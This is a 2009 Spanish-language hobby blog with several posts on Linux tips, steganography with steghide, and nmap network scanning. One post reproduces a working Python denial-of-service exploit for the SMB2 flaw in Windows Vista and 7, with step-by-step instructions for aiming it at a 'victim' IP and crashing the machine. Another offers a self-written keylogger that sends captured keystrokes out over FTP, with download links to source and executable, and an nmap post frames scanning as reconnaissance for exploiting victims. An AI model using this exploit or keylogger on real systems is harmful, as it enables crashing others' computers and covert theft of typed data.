domingo, 27 de septiembre de 2009

Cosas de nmap #2

  Hoy vamos a ver como saber los sistemas operativos y los puertos que tienen abiertos los ordenadores de nuestra red. Para realizar esta tarea utilizaremos nmap.
  Para hacer esto tenemos que abrir una shell en linux y poner:
        
                 sudo nmap -O 192.168.1.0/24
  Con esto se mostrarán todas las máquinas de la red con sus respectivos sistemas operativos, además se mostraran los puertos abiertos y los servicios que estos utilizan, información muy útil si despues queremos tener acceso a las victimas mediante exploits (en futuras entradas se vera la utilización de estos exploits).

Un saludo y nos vemos en futuras entradas.

Alpha.Aetsu

martes, 22 de septiembre de 2009

Grave vulnerabilidad encontrada en Windows vista y el futuro windows 7

Esta vulnerabilidad ha sido encontrada hace unos dias y afecta procotolo SMB, con lo que no se ha echo esperar mucho un exploit que la aprovecha, en este caso desarroyado por Laurent Gaffié en python. Aqui tenemos el exploit:
#!/usr/bin/python
# -*- coding: utf-8 -*-
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket
from time import sleep

host = "Ip-victima", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()


Para utilizarlo (trabajando desde linux) copiamos y con cualquier editor de texto lo guardamos con el nombre que queramos y con extension .py (de python).
    Por ejemplo:
              morsa.py

Ahora ya tenemos el exploit, solo necesitamos una víctima, en mi caso dispongo de una máquina virtual vmware con Windows Vista SP1.

Bueno primero necesitamos la ip de la víctima, la podemos obtener ya sea por nmap o por cualquier otro método, en el caso de nmap seria:
             sudo nmap -sP -PI 192.168.1.0/24

Supongamos que la ip es 192.168.0.102 pues abrimos el exploit con el editor de texto plano (recomiendo kate) y editamos la línea que pone:

           host = "Ip-victima", 445

Aqui sustituimos Ip-victima por 192.168.0.102 con lo que quedaria


           host = "192.168.0.102", 445

Guardamos el exploit, nos dirigimos al directorio de este y abrimos una consola:
          python morsa.pl       


    
Al lanzar esto y esperar unos segundos veremos el bonito pantallazo azul en la maquina virtual:



Bueno con esto espero que quede clara la utilización del exploit y recordad que Windows Vista no requiere de exploits para que deje de funcionar correctamente, ya que, el por si solo ya lo hace y con mucho esmero.

Aclaraciones: Esta vulnerabilidad se basa en los recursos compartidos de la máquina víctima, si Windows Vista tiene deshabilitada la opción de compartir archivos e impresoras no funcionara.


Un saludo.



Alpha.Aetsu

jueves, 17 de septiembre de 2009

Cosas de linux #2

 Hoy vamos a ver el comando sleep. La utilidad de este comando es poner nuestro ordenador a esperar y cuando pase un determinado tiempo realice una acción.
Vamos a ver la sintaxis:
         sleep {tiempo a esperar} {m(minutos) s(segundos)};{orden a realizar}

Ahora un ejemplo:
         sleep 100m; killall exaile

Lo que realiza esta orden es esperar 100 minutos y cuando transcurra ese tiempo cierra el reproductor de musica exaile.

También es útil cuando queremos apagar el ordenador en un tiempo concreto, pero, en este caso deberemos primero loggearnos como root, ya que sino transcurrido el tiempo nos pedira la autentificación y no apagará el ordenador.
Veamos el ejemplo:
         sudo su
         sleep 50m; shutdown -h 1

Con esta orden vemos que transcurridos los 50 minutos el sistema llama a la orden shutdown que apaga el ordenador, pero nos dara un margen de 1 minuto por si queremos cancelar el apagado (shutdown -a en una consola).

Esto es todo por ahora.

Un saludo.

martes, 15 de septiembre de 2009

 Hoy vamos a ver como esconder un archivo de texto en, por ejemplo, una imagen.
 Primero necesitamos instalar steghide:
    sudo apt-get install steghide
 Ahora creamos una carpeta:
    mkdir morsa

 En ella situamos una imagen jpg y un archivo .txt. En este caso llamaremos a la imagen “imagen”(nombre original donde los haya) y al txt lo llamaremos “secreto”.
 Con esto en la carpeta morsa tendremos:
           -  imagen.jpg
           -  secreto.txt

 Procedamos a ocultar el archivo. Nos dirigimos a la carpeta morsa, abrimos una consola y ponemos, en el caso del ejemplo:
    steghide embed -cf imagen.jpg -ef secreto.txt   

 La sintaxis general seria:
    steghide embed -cf -ef

 Una vez introducido esto nos pedira un “salvoconducto”, que es una contraseña que deberemos recordar para posteriormente desencriptar el archivo.
 Una vez puesto el salvoconducto ya podemos eliminar el archivo oculto.

 Para revelar el archivo adjunto a la imagen escribimos:
    steghide extract -sf imagen.jpg

 Con la sintaxis general seria:
  steghide extract -sf  .jpg
 Con esto aparecera el archivo oculto.


ACLARACIONES: El archivo a ocultar no debe ser demasiado grande sino puede dar un error el steghide. El archivo oculto puede ser de cualquier formato, pero el archivo que lo contiene solo puede ser un “.jpg”, “.bmp”, “ .wmv” o “.au”.
Esto es todo por hoy, un saludo.

nmap

Ahora vamos a utilizar una potente herramienta conocida como nmap.
Para instalarla en linux:
    sudo apt-get install nmap
Para windows descargarla de la pagina de nmap.
    http://nmap.org/


Bueno vamos a ver una de las muchas utilidades de nmap, en este caso para ver los ordenadores que están conectados a nuestra misma red:
    sudo nmap -sP -PI 192.168.1.0/24

Con la opcion -sP nmap realiza un barrido ping de la red y devuelve los ordenadores que han contestado(los conectados). La opcion -PI lanza paquetes de sondeo con la intencion de evitar algunos firewall.

Bueno esto es todo por hoy.

Un saludo.

jueves, 10 de septiembre de 2009

Cosas de linux

Con este titulo pasare a comentar curiosidades o utilidades relacionadas con linux (según las vaya aprendiendo yo en linux, ya que soy un novato en este tema).

La primera es como convertir paquetes .rpm en .deb para poder instalarlos Debian y sus derivados (Ubuntu, Kubuntu...).

sudo apt-get install alien

sudo alien

Primer contenido

Bueno para estrenar el blog presento mi primer programa decente (vamos que funciona y no explota). Se trata de un keylogger que ire perfeccionando con el tiempo capaz de mandar los datos capturados por ftp.

Pero ¿qué es un keylogger?

Según la Wikipedia un Keylogger un tipo de software que se encarga de registrar las pulsaciones que se realizan en el teclado, para memorizarlas en un fichero y/o enviarlas a través de internet.

Aqui os dejo el código del keylogger y el programa ya compilado (.exe):

Código:
https://sourceforge.net/projects/morsa-keylogger/files/morsa-keylogger.cpp/download


Ejecutable:
https://sourceforge.net/projects/morsa-keylogger/files/morsa-keylogger.zip/download



Agradezco cualquier sugerencia o correccion sobre el programa, asi como sus bugs, los cuales se intentaran reparar en futuras versiones.

Presentacion

Bueno este va a ser un blog dedicado principalmente a temas de informática, tanto de programación, seguridad o noticias varias. También es probable que publique informacion sobre videojuegos o consolas y algún que otro tema.

Bueno como introducción esto es todo, un saludo.